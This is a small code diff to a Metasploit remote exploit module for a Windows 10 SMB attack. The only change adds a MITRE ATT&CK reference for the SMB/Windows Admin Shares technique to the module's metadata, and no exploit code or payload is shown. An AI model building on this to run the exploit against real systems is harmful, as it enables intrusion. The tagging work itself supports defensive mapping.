@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => true,
         'Payload' => {},
         'References' => [
-          ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack']
+          ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'],
+          ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
         ],
         'Arch' => [ARCH_X86, ARCH_X64],
         'Platform' => 'win',
